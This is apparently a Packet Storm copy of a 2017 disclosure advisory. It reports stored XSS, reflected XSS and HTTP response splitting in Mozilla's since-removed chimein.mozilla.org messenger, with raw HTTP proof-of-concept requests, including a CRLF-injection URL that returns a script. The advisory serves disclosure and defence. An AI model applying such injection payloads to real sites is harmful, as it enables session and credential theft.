exploit the possibilities

Chimein.mozilla.org Cross Site Scripting

Chimein.mozilla.org Cross Site Scripting
Posted Apr 3, 2017
Authored by Yann CAM

Chimein.mozilla.org suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | 7ba9f4a4d61281bba898e7e5feaf31b6

Chimein.mozilla.org Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: Mozilla.org sub-domain Stored-XSS - Reflected-XSS - HTTP Response Splitting
# Date: 03/04/2017
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.mozilla.org
# Version: /
# Category: Stored Cross Site Scripting / Reflected Cross Site Scripting / HTTP Response Splitting
# Google dork:
# Tested on: mozilla.org chimein sub-domain
######################################################################

Mozilla description :
======================================================================

Mozilla is a free-software community, created in 1998 by members of Netscape. The Mozilla community uses, develops, spreads and supports Mozilla products,
thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla
Foundation and its tax-paying subsidiary, the Mozilla Corporation.

Mozilla produces many products such as the Firefox web browser, Thunderbird e-mail client, Firefox Mobile web browser, Firefox OS mobile operating system,
Bugzilla bug tracking system and other projects.


Vulnerabilities description :
======================================================================

The Chimein.mozilla.org sub-domain (access via HTTPS) provides a secure web messenger application. This application needs autrhentication.
Each user is authenticated with a "login / password". Then, to sent message to other user, a public/private key is used to encrypt and sign message.
The private key is protected via a passphrase.

This secure web messenger application contains several vulnerabilities :

- A stored XSS is available in the body of each message sent encrypted to other users.
Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla's users credentials such key/password.

- A reflected XSS is available in the sign up process (login).
Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla's users credentials such key/password.

- A HTTP Response Splitting is available in the "/message/get" endpoint.
This vulnerability can be used to create Reflected XSS.


Proof of Concept ndeg1 : Stored Cross-Site Scripting
======================================================================

The chimein.mozilla.org domain (https://chimein.mozilla.org/) provides a very simple "sign up / sign in / send message" process with asymetric encryption (public key,
private key, password and passphrase) to add a strong security for message exchange.

A simple user can create an account, log in with this account, and send encrypted message (with passphrase) to any other user registered.
There are some XSS vulnerabilities. The most critical is a Stored-XSS in the body of any message. A user will be able to create an account as describe here :

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_001.png

Login = ycam, password = ycam, passphrase = ycam

Then, once logged in, the user can sent an arbitrary message to any other user (in the example, the message is sent to the user himself for the Proof of Concept) :

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_002.png

The Stored-XSS payload can be injected in the "body" of the message. The user selects a specific passphrase, so the payload is encrypted.
Once sent, the message is visible for the receiver logged. When this victim-user clic on the message, he has to enter the passphrase used at encryption time.

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_003.png

When the passphrase is indicated, the body of the message is decrypted and the Stored-XSS is triggered (PoC : alert(document.domain)).

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_004.png

Stored-XSS are very critical vulnerabilities and can be used by an attacker to steal private information such as session cookie or credential. Through XSS, an attacker
can tamper with page rendering, take the control of the full browser and can use browser's exploits to gain privilege on local system (especially with dedicated
framework for XSS flaw like BeEF : http://beefproject.com/).

This Stored-XSS was tested successfully with the latest Firefox version 49.0.2, latest Chrome version 53 and the latest IE version 11.

In this case, the main Stored-XSS is embeded in a personal message didacted to a victim (the victim needs to enter the passphrase to decrypt the message's body and
trigger the payload). This is a serious issue because the XSS is located in a very secure chat system with asymetric encryption used.
An attacker will be able to create fake page, fake prompt, fake "re-authentication" process to steal victim's password. If the attacker gains access to a victim's
account, he can used all the feature of the secure chat in place of the legitimate user.

PoC - HTTP request sample (with encrypted payload) :

POST /message/create HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://chimein.mozilla.org/
Content-Length: 1483
Content-Type: text/plain;charset=UTF-8
DNT: 1
Connection: close

login=ycam&password=ycam&sender=ycam&recipient=ycam&subject=ycam&subject_signature=C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E%0D%0A%2FPMRAbK6IZF9O9G%2BkOmy9a%2FmSPY9L8yiFdwk8CXzW%2Fnvmirx3qelwQ87z3cgrxGe8um7Ntc603h2%0D%0AWrux3wQrv5JptqEMC1Cj%2BatQQQ%2FB6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI%0D%0AKpy%2F0TgJhkpWj%2BPO3YIvxy015imeISUgmZyTmOaJAy7%2FOQzvw5GUAS5nTG%2FtU79kO7AlhQLTgjlL%0D%0AE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw%3D%3D&body=O8E%2BSCVlBZiL8xsg0yEg%2BK5%2BjdHKkuQA89z8FpLDekOT3CUa43B%2FQw%2BBxyCTgccngdRp7en7Zi%2BM%0D%0AwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK&body_signature=kFLh%2BgNR1Ow2zuxqRebnYmiB%2FN2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z%2BYF13e%0D%0AzyWBWtwmSPff%2B6JFWIHGqYI2RR%2BqszbAduHwHSniFPkz0gKntc%2FxOe8GFX62z78pAPJfZ4tLyg8p%0D%0ALobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt%2B6t7GkCWf799ztY8R0WYJ8q%0D%0AskQAYD5LuHpdadi8%2B8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj%2BF9z8KFgc%0D%0AvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ%3D%3D&session_key=a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG%2BMmtmZjcwAPJjXePxH8%2F1XWWolhPn1fRmf4j9ybmo%0D%0AlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM%0D%0ATxVPIcT%2FvLbjTA0hrnzmm%2Ftiyq31YPVOYq3Di95urw38DFJIRPKiP%2FcJ0GoWkUrcB6OK8lCfvx0K%0D%0AWsS%2BPpAB%2Fc1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ%2B2AkjhwcNzqWHQb%0D%0AHHm1wN6fkalHKXW7%2BwM2ctioB1JaE3gYE7WmGA%3D%3D&session_key_iv=zOtfAHFpmaW%2Bhm2xcJhPxw%3D%3D&


Proof of Concept ndeg2 : Reflected Cross-Site Scripting
======================================================================

There is another Reflected XSS vulnerability in the "login" text input during registration (the user login needs to be new at each sign up) :

Payload injection :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_001.png

Reflected XSS fired :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_002.png


Proof of Concept ndeg3 : HTTP Response Splitting leverage to Reflected XSS
======================================================================

Exchange requests are made through API call, for example when a user POST a message, it's the "/message/create" entry point which is called.
To list message "/message/list", and to consult a specific message the following request is made (as example, the message ID : 57 owned by
the user ycam with password ycam used as Proof of Concept) :

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

login=ycam&password=ycam&id=57

The resulting data are like (JSON) :

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 1525
Date: Fri, 21 Oct 2016 00:05:14 GMT
Connection: close

{"id":57,"sender":"ycam","recipient":"ycam","subject":"ycam","subject_signature":"C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E\r\n/PMRAbK6IZF9O9G+kOmy9a/mSPY9L8yiFdwk8CXzW/nvmirx3qelwQ87z3cgrxGe8um7Ntc603h2\r\nWrux3wQrv5JptqEMC1Cj+atQQQ/B6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI\r\nKpy/0TgJhkpWj+PO3YIvxy015imeISUgmZyTmOaJAy7/OQzvw5GUAS5nTG/tU79kO7AlhQLTgjlL\r\nE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw==","body":"O8E+SCVlBZiL8xsg0yEg+K5+jdHKkuQA89z8FpLDekOT3CUa43B/Qw+BxyCTgccngdRp7en7Zi+M\r\nwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK","body_signature":"kFLh+gNR1Ow2zuxqRebnYmiB/N2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z+YF13e\r\nzyWBWtwmSPff+6JFWIHGqYI2RR+qszbAduHwHSniFPkz0gKntc/xOe8GFX62z78pAPJfZ4tLyg8p\r\nLobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt+6t7GkCWf799ztY8R0WYJ8q\r\nskQAYD5LuHpdadi8+8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj+F9z8KFgc\r\nvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ==","session_key":"a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG+MmtmZjcwAPJjXePxH8/1XWWolhPn1fRmf4j9ybmo\r\nlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM\r\nTxVPIcT/vLbjTA0hrnzmm/tiyq31YPVOYq3Di95urw38DFJIRPKiP/cJ0GoWkUrcB6OK8lCfvx0K\r\nWsS+PpAB/c1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ+2AkjhwcNzqWHQb\r\nHHm1wN6fkalHKXW7+wM2ctioB1JaE3gYE7WmGA==","session_key_iv":"zOtfAHFpmaW+hm2xcJhPxw==","status":"read","sent_date":"2016-10-20T23:05:30.009Z","retrieved_date":"2016-10-20T23:06:45.811Z","read_date":"2016-10-20T23:06:48.066Z"}

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png

If a user changes the value of the "id" in POST param of the initial request, the following error is retrieved :

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

login=ycam&password=ycam&id=xxx

Error received :

HTTP/1.1 500 message xxx does not exist
Date: Fri, 21 Oct 2016 00:07:11 GMT
Connection: close
Content-Length: 0

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png

There is a reflection of the "id" value in the HTTP headers returned by the server.

With the sequence %0a%0d (\r\n), an attacker can forge headers and responses content himself :

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

login=ycam&password=ycam&id=xxx%0a%0dyyy%0a%0dzzz%0a%0d

Response :

HTTP/1.1 500 message xxx
yyy
zzz
does not exist
Date: Fri, 21 Oct 2016 00:08:40 GMT
Connection: close
Content-Length: 0

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png

So, with a specific payload, an attacker can forge his own response from the server with the right headers (Content-Type: text/html)
and arbitrary source code. Plus, the payload can be sent directly in GET param or in POST param. In GET, the vulnerability is more easy
to sent to victims :

https://chimein.mozilla.org/message/get?login=ycam&password=ycam&id=x%0a%0dContent-Length: 100%0a%0dContent-Type: text/html%0a%0d%0a%0d<html><body><script>alert(document.domain)</script></body></html><!--

Or hidden with the url-shortener bit.ly :

https://mzl.la/2eypf8b

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_006.png

Tested successfully with the latest Firefox version 49.0.2.

HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to
properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and
similar exploits.

Screenshots :
======================================================================

- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_002.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_003.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_004.png

- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_002.png

- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_006.png


Solution:
======================================================================

Fixed by Mozilla security team.
DNS entry "chimein.mozilla.org" deleted


Additional resources / article and screenshots :
======================================================================

- https://www.mozilla.org
- https://bugzilla.mozilla.org/show_bug.cgi?id=1311883
- https://bugzilla.mozilla.org/show_bug.cgi?id=1311887
- https://bugzilla.mozilla.org/show_bug.cgi?id=1312034
- https://www.mozilla.org/en-US/security/bug-bounty/web-hall-of-fame/
- http://www.asafety.fr
- http://www.synetis.com
- https://www.asafety.fr/vuln-exploit-poc/contribution-mozilla-http-response-splitting-reflected-stored-xss/


Report timeline :
======================================================================

2016-10-20 : Mozilla security team alerted with details and PoC (via 2 BugZilla submissions)
2016-10-21 : Mozilla response and fix issues via DNS entry deletion.
2016-10-21 : Mozilla acknowledgement (out of scope for the Bug Bounty, but eligible to some goodies)
2017-04-03 : Mozilla acknowledgement on Mozilla Web and Services Hall of Fame (2016Q4)
2017-04-04 : Public advisory

Credits :
======================================================================

88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security

Yann CAM - Security Consultant @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    22 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    30 Files
  • 16
    Jan 16th
    0 Files
  • 17
    Jan 17th
    0 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close